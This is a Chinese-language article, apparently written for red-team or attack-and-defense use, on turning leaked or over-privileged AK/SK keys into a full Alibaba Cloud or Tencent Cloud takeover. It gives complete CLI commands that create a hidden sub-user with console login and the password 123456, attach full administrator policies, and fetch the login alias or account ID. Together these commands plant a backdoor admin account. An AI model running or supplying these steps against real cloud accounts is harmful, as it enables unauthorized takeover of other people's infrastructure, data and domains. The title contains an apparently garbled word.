使用官方工具AK、SK实现易怒平台的高效接管方法

前言

在云计算领域，AK（Access Key）和SK（Secret Key）通常被用于进行 API 调用，以便访问和管理云服务资源。这些密钥的安全性至关重要，因为它们授权对云资源执行各种操作。泄露或不当使用这些密钥可能导致严重的安全风险和数据泄露。

实际操作中，大多数文章基本上都是在介绍工具，如OSS、RDS、ECS等。但实际上，如果 AK 和 SK 的权限过大，可以通过创建子用户来登录云管理控制台，这可能会使攻击者获取进一步的权限，甚至接管域名和即时通讯服务等，从而扩大攻击和防御的成果。

接下来将介绍腾讯云和阿里云的子用户管理方式，其他云服务商的管理方式大同小异，只需参考其官方文档即可。

阿里云

阿里云提供了RAM（Resource Access Management）服务，可以通过官方介绍了解更多。

RAM 用户可以由阿里云账号（主账号）或具有管理员权限的其他 RAM 用户创建，同时可以使用 AK 和 SK 进行 API 调用。

根据阿里云官方提供的命令行工具（https://github.com/aliyun/aliyun-cli/blob/master/README-CN.md）进行配置 AK 和 SK：

bash复制./aliyun configure --profile akprofile

创建 RAM 账号、设置密码、设置权限等操作如下：

bash复制# 创建 RAM 账号 ./aliyun ram CreateUser --UserName SxfnbQaxsb2333 # 设置密码 ./aliyun ram CreateLoginProfile --UserName SxfnbQaxsb2333 --Password 123456 # 设置权限 ./aliyun ram AttachPolicyToUser --PolicyType System --PolicyName AdministratorAccess --UserName SxfnbQax**2333

创建完成后，可通过以下命令获取阿里云账号的别名：

bash复制./aliyun ram GetAccountAlias

登录账号格式为：创建的用户名@别名.onaliyun.com，登录方式与主账号相同。

技术细节

腾讯云同样提供了子用户管理功能，不同之处在于称之为子用户，并且登录子用户需要主账号 ID。

通过下载腾讯云官方命令行工具（https://github.com/TencentCloud/tencentcloud-cli），执行以下操作：

bash复制# 获取主用户 ID tccli cam GetUserAppId --cli-unfold-argument # 创建子用户 tccli cam AddUser –cli-unfold-argument --Name Sxfnb2333 --Remark sxf --ConsoleLogin 1 --Password '123456' --NeedResetPassword 0 # 查询策略 tccli cam ListPolicies --cli-unfold-argument # 授权最高权限 tccli cam AttachUserPolicy --cli-unfold-argument --PolicyId 1 --AttachUin 100035117703 # 列出子用户 tccli cam ListUsers --cli-unfold-argument

创建完成后，即可通过相应的子用户登录腾讯云控制台。